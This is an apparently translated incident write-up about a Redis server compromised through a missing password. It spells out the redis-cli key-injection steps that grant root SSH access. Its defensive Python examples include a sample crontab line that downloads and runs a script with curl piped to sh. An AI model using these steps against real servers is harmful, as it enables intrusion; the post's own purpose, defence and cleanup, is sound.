This problem is actually documented all over the web. But I come from a development background and am weak on operations, which is how I ran into it, so I am writing it down as a lesson.
Symptoms of the intrusion
A lot of unexplained commands showed up in the server's shell history (seen by running history).
The server rebooted for no apparent reason.
Passwordless SSH login (public-key authentication) kept breaking.
apt-get failed with errors.
The error log was as follows:
insserv: warning: script 'S01wipefs' missing LSB tags and overrides
insserv: warning: script 'S02acpidtd' missing LSB tags and overrides
insserv: warning: script 'S99selinux' missing LSB tags and overrides
insserv: warning: script 'S02DbSecuritySpt' missing LSB tags and overrides
insserv: warning: script 'wipefs' missing LSB tags and overrides
insserv: warning: script 'DbSecuritySpt' missing LSB tags and overrides
insserv: warning: script 'selinux' missing LSB tags and overrides
insserv: warning: script 'acpidtd' missing LSB tags and overrides
insserv: There is a loop between service plymouth and mountdevsubfs if started
insserv: loop involving service mountdevsubfs at depth 2
insserv: loop involving service udev at depth 1
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
It looks harmless at first glance, doesn't it; after all, selinux sounds like an ordinary security service. It is not: SELinux is a kernel security module, not an init script, and a stock Ubuntu install (which uses AppArmor) has no /etc/init.d/selinux at all. The name is camouflage.
Cause of the intrusion: unauthenticated Redis
Redis is reachable directly at IP:port, so an instance with no password configured and not bound to a specific interface is wide open to anyone who can reach it. Through redis-cli the attacker changes the persistence directory to /root/.ssh (CONFIG SET dir), renames the dump file to authorized_keys (CONFIG SET dbfilename), stores their own SSH public key as the value of a key and runs SAVE. The RDB dump is then written over /root/.ssh/authorized_keys; sshd reads that file line by line and silently skips any line it cannot parse, so the public key sitting on its own line inside the binary dump is accepted and the attacker can log in over SSH. This only works because Redis runs as root (or as some user whose ~/.ssh it can write), which is why the dump path below is /root/.ssh. A detailed write-up is at https://bbs.ichunqiu.com/thread-17634-1-1.html. The rough attack sequence is:
Write the public key into a text file, padded with blank lines so that it lands on a line of its own inside the binary dump:
cd ~/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")> hack.txt
Connect to the target's Redis with the client and store the file as the value of a key named crack:
cat hack.txt | /usr/local/redis-2.8.3/src/redis-cli -h 192.168.132.134 -x set crack
Change the directory and filename Redis writes its RDB dump to (the current values can be read back with CONFIG GET dir / CONFIG GET dbfilename):
CONFIG SET dir /root/.ssh
CONFIG SET dbfilename authorized_keys
Save, which writes the dump to /root/.ssh/authorized_keys:
save
From this point on the attacker can SSH in as root without a password.
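The following is an added example, not code from the original post or from the write-up it links to. It shows two things the steps above rely on: the RESP bytes redis-cli actually sends for those commands and how a reply tells an open instance apart from a password-protected one, and why hack.txt is padded with blank lines. For the second point it walks a constructed, RDB-like byte blob the way sshd walks authorized_keys (line by line, skipping anything it cannot parse) and shows that the key is only accepted when it sits on a line of its own. The host, port, key material and dump bytes are all constructed; the dump is not a faithful RDB encoding, only the property that matters (the value is copied verbatim between non-text bytes) is reproduced.

```python
import base64
import socket
import struct

# Added example, not from the original post. Host/port, key material and the
# RDB-like bytes below are constructed for the demo.

KEY_TYPES = {b"ssh-rsa", b"ssh-ed25519", b"ssh-dss", b"ecdsa-sha2-nistp256",
             b"ecdsa-sha2-nistp384", b"ecdsa-sha2-nistp521"}


def resp_encode(*args):
    """Encode a command as a RESP array of bulk strings, as redis-cli does on the wire."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg if isinstance(arg, bytes) else str(arg).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def classify_reply(reply):
    """Classify a reply to an unauthenticated command: 'open', 'auth_required' or an error."""
    line = reply.split(b"\r\n", 1)[0]
    if line.startswith(b"-NOAUTH"):            # requirepass is set (Redis's literal error prefix)
        return "auth_required"
    if line[:1] in (b"+", b"$", b":", b"*"):   # status, bulk, integer, array: it ran without AUTH
        return "open"
    if line.startswith(b"-"):
        return "error:" + line[1:].decode(errors="replace")
    return "unknown"


def probe(host, port=6379, timeout=3.0):
    """Send an unauthenticated PING to a live instance (network; host/port are assumed)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(resp_encode("PING"))
        return classify_reply(sock.recv(512))


def parse_pubkey_line(line):
    """Return the key type if `line` is a usable public-key line, else None.
    Mirrors sshd's checks: known type, base64 body whose wire blob starts with the type.
    (sshd also accepts an options prefix before the type; this demo does not.)"""
    fields = line.split()
    if len(fields) < 2 or fields[0] not in KEY_TYPES:
        return None
    try:
        blob = base64.b64decode(fields[1], validate=True)
    except ValueError:
        return None
    if len(blob) < 4:
        return None
    n = struct.unpack(">I", blob[:4])[0]
    if blob[4:4 + n] != fields[0]:
        return None
    return fields[0].decode()


def keys_accepted_by_sshd(file_bytes):
    """Walk a file the way sshd walks authorized_keys: line by line, skipping junk lines."""
    found = []
    for line in file_bytes.split(b"\n"):
        line = line.strip()
        if not line or line.startswith(b"#"):
            continue
        key_type = parse_pubkey_line(line)
        if key_type:
            found.append(key_type)
    return found


def fake_pubkey():
    """Constructed ssh-ed25519 line (32 zero bytes, not a real key) standing in for id_rsa.pub."""
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + b"\x00" * 32
    return b"ssh-ed25519 " + base64.b64encode(blob) + b" attacker@example\n"


def pad_key(key):
    """Same padding as: (echo -e "\\n\\n"; cat id_rsa.pub; echo -e "\\n\\n") > hack.txt"""
    return b"\n\n" + key + b"\n\n"


def fake_rdb_dump(value):
    """Constructed stand-in for the file SAVE writes: binary header, the stored value copied
    verbatim, binary trailer. Not a faithful RDB encoding; note there is no newline between
    the header bytes and the value, which is the whole reason the padding is needed."""
    return b"REDIS0006\xfe\x00\x00\x05crack\xc2" + value + b"\xff\x8a\xb1\x02\x03\x04\x05\x06\x07"


if __name__ == "__main__":
    print("unpadded key in dump ->", keys_accepted_by_sshd(fake_rdb_dump(fake_pubkey())))
    print("padded key in dump   ->", keys_accepted_by_sshd(fake_rdb_dump(pad_key(fake_pubkey()))))
    print(resp_encode("CONFIG", "SET", "dbfilename", "authorized_keys"))
```

Without the padding, the first line of the dump is the RDB header glued directly onto "ssh-ed25519 ...", so the first whitespace-separated field is not a key type and sshd discards the line. With the padding the key is on its own line and is accepted. probe() is for checking your own instances; a reply of "open" to an unauthenticated PING means the CONFIG SET sequence above would also have worked.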
Closing the hole
It is simple: set a password in the Redis configuration file (requirepass). Then redis-cli cannot run any command without AUTH first.
In addition, bind Redis to a specific address in the configuration file (bind 127.0.0.1, or the private interface that actually needs it) so that it is not reachable from the internet at all. A password alone is not enough: Redis answers AUTH so fast that a short password can be brute-forced over the network. Two further measures cost nothing: run Redis as an unprivileged user, so that even a successful CONFIG SET dir cannot write into /root/.ssh, and disable or rename the CONFIG command with rename-command in redis.conf so that the persistence path cannot be changed from a client at all. (Redis 3.2 and later also ship protected-mode, which refuses remote connections when no bind and no password are configured; the 2.8 branch used here does not have it.)
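As an added example (not from the original post), here is a small checker for the redis.conf directives that decide whether the attack above is possible, run over a constructed weak configuration and the same configuration after the fix. The two configuration texts are samples written for this demo, not the author's real files; the password in the hardened sample is a placeholder (generate a real one with something like openssl rand -hex 32). The checker reads the directives the way Redis documents them and only tests protected-mode when told the version is 3.2 or later, since the directive does not exist before that.

```python
# Added example, not from the original post. WEAK_CONF and HARDENED_CONF are
# constructed samples; the hardened password is a placeholder.

WEAK_CONF = """\
# constructed sample: the defaults that left the post's server open
port 6379
# bind 127.0.0.1
# requirepass foobared
dir /var/lib/redis
"""

HARDENED_CONF = """\
# constructed sample: the same file after the fix
port 6379
bind 127.0.0.1
requirepass 0b3f7c2a9e4d5b6f8a1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e
rename-command CONFIG ""
dir /var/lib/redis
"""


def parse_conf(text):
    """Return {directive: [values...]} for the active (uncommented) lines of a redis.conf.
    A directive that appears more than once keeps every value; the last one wins in Redis."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf.setdefault(parts[0].lower(), []).append(parts[1] if len(parts) > 1 else "")
    return conf


def audit_redis_conf(text, redis_version=(2, 8, 3)):
    """Return a list of findings; an empty list means none of the audited weaknesses is present."""
    conf = parse_conf(text)
    findings = []

    # bind: no directive at all means every interface; 0.0.0.0 / :: / * mean the same thing
    binds = conf.get("bind", [])
    bound_addrs = {addr for value in binds for addr in value.split()}
    if not binds or bound_addrs & {"0.0.0.0", "::", "*"}:
        findings.append("bind: listening on all interfaces (no bind, or bind 0.0.0.0/::)")

    # requirepass: absent means anyone who reaches the port can run CONFIG SET; short
    # means brute-forceable, because Redis processes AUTH attempts very quickly
    password = conf.get("requirepass", [""])[-1].strip('"')
    if not password:
        findings.append("requirepass: not set, anyone who can reach the port can run CONFIG SET")
    elif len(password) < 32:
        findings.append("requirepass: short password; Redis AUTH is fast enough to brute-force")

    # protected-mode exists from 3.2 and defaults to yes; only a literal "no" is a finding
    if redis_version >= (3, 2):
        if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
            findings.append("protected-mode: disabled")

    # rename-command CONFIG "" disables the command; renaming it to a secret also counts
    renamed = {value.split()[0].lower() for value in conf.get("rename-command", []) if value.split()}
    if "config" not in renamed:
        findings.append("rename-command: CONFIG is reachable under its default name")

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, "->", audit_redis_conf(conf) or "no findings")
```

To use it on a real host, pass the contents of the running instance's configuration file (redis-cli CONFIG GET dir, or ps, shows which file that is) and the output of redis-cli INFO server for the version. The checker cannot see which user Redis runs as; check that separately with ps -o user= -C redis-server.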
Removing the intruder's programs
Some of this is owed to https://yq.aliyun.com/ask/57692?spm=5176.8246799.0.0.iwQw3W and https://www.cnblogs.com/liuchuyu/p/7490338.html.
The first thing I looked at was why apt-get was failing on selinux. The server had a file /etc/init.d/selinux, whereas my own Ubuntu PC has no such file. Looking inside it, I found that it launched a process (key point): /usr/bin/getty. I searched online for what that process is and, sure enough, it is the trojan process, so I deleted it. (The distribution's own getty lives in /sbin, as /sbin/getty or /sbin/agetty; a copy under /usr/bin is out of place by itself.) Online I also read that DbSecuritySpt in the same directory is part of the same intrusion.
The apt-get errors also named startup entries such as S01wipefs and S02acpidtd, so I removed all the S01 to S06 entries from the rc*.d directories, checked whether any of those programs were still running, and killed them all.
Likewise, in /usr/bin there was a program disguised as ssh, .sshd; I rm'd all of it.
According to https://www.cnblogs.com/liuchuyu/p/7490338.html, this intrusion turns the server into a mining machine and adds crontab entries. I checked and, sure enough, there were scheduled jobs belonging to the trojan; without hesitation I deleted the lines with dd in crontab -e.
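The cleanup above touches three places: init scripts and their rc*.d links, running processes, and crontab. The following is an added example, not code from the original post, that turns those checks into a triage pass over text you feed it, so it can be run on output captured from a suspect host (cat of each /etc/init.d script, ps -eo pid,args --no-headers, crontab -l, ls /etc/rc2.d) or, as here, on constructed samples. The script names, /usr/bin/getty and /usr/bin/.sshd are the indicators the post reports; the sample ps listing, the cron line with the 198.51.100.7 download, and the sample init script bodies are invented for the demo. It differs from the post in one respect, deliberately: rather than deleting every S01 to S06 link, it only picks links whose target is one of the named scripts, so that legitimate early-start links survive.

```python
import re

# Added example, not from the original post. The sample init scripts, ps output,
# crontab and rc2.d listing below are constructed for the demo.

INIT_SCRIPTS_FROM_POST = {"selinux", "DbSecuritySpt", "wipefs", "acpidtd"}
PLANTED_BINARIES = {"/usr/bin/getty", "/usr/bin/.sshd"}
# On Debian/Ubuntu the distribution's getty is /sbin/getty (or /sbin/agetty);
# anything called getty outside /sbin is out of place.

SAMPLE_INIT = {
    "selinux": "#!/bin/sh\n/usr/bin/getty &\n",   # shaped like what the post describes
    "ssh": "#!/bin/sh\n### BEGIN INIT INFO\n# Provides: sshd\n### END INIT INFO\n/usr/sbin/sshd\n",
}
SAMPLE_PS = """\
  1 /sbin/init
842 /sbin/getty -8 38400 tty1
913 /usr/bin/getty
944 /usr/bin/.sshd
"""
SAMPLE_CRON = """\
# constructed sample crontab
*/10 * * * * curl -fsSL http://198.51.100.7/run.sh | sh
0 3 * * * /usr/bin/getty
30 6 * * * /usr/local/bin/backup.sh
"""
SAMPLE_RC = "S01wipefs S02acpidtd S02DbSecuritySpt S20ssh S21rsyslog S99selinux"


def init_script_findings(name, content):
    """Reasons an /etc/init.d script looks planted; [] means nothing noticed."""
    reasons = []
    if name in INIT_SCRIPTS_FROM_POST:
        reasons.append("name matches a script the intrusion installed")
    if "### BEGIN INIT INFO" not in content:
        reasons.append("no LSB header (this is what insserv was warning about)")
    for path in sorted(PLANTED_BINARIES):
        if path in content:
            reasons.append("starts " + path)
    return reasons


def suspicious_processes(ps_lines):
    """From `ps -eo pid,args --no-headers` output, return (pid, args) for planted binaries,
    for hidden executables (basename starting with a dot) and for a getty outside /sbin."""
    hits = []
    for line in ps_lines.splitlines():
        parts = line.split(None, 1)
        if len(parts) < 2:
            continue
        pid, args = parts
        exe = args.split()[0]
        base = exe.rsplit("/", 1)[-1]
        if exe in PLANTED_BINARIES or base.startswith(".") or (base == "getty" and not exe.startswith("/sbin/")):
            hits.append((int(pid), args))
    return hits


def suspicious_cron_lines(crontab_text):
    """Cron entries that download-and-run, or that call a planted binary."""
    hits = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", entry) or any(p in entry for p in PLANTED_BINARIES):
            hits.append(entry)
    return hits


def rc_links_to_remove(rc_dir_listing):
    """From an `ls /etc/rcN.d` listing, pick the S/K links whose target is a named script."""
    out = []
    for name in rc_dir_listing.split():
        match = re.match(r"^[SK]\d\d(.+)$", name)
        if match and match.group(1) in INIT_SCRIPTS_FROM_POST:
            out.append(name)
    return out


if __name__ == "__main__":
    for name, body in SAMPLE_INIT.items():
        print("init.d/%s:" % name, init_script_findings(name, body) or "ok")
    print("processes:", suspicious_processes(SAMPLE_PS))
    print("cron:", suspicious_cron_lines(SAMPLE_CRON))
    print("rc links:", rc_links_to_remove(SAMPLE_RC))
```

The LSB-header check is the same signal insserv gave in the apt-get log: a script with no "### BEGIN INIT INFO" block is not how distribution packages install services, so on an Ubuntu box every such script in /etc/init.d deserves a look, not only the four names from this incident.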
After that apt-get ran without errors, the next day there was no more unexplained history, and SSH worked again. One step that belongs on the list: the dump Redis wrote over /root/.ssh/authorized_keys contains the attacker's public key, so that file has to be rebuilt from the keys you actually trust, otherwise the attacker keeps a way back in even with every planted binary gone. And once someone has had root on a machine, removing the files you happened to find is no guarantee that it is clean; rebuilding from a known-good image and rotating any credentials the host held is the safer course.
Conclusion: I was never an ops person, but do enough development and you become one.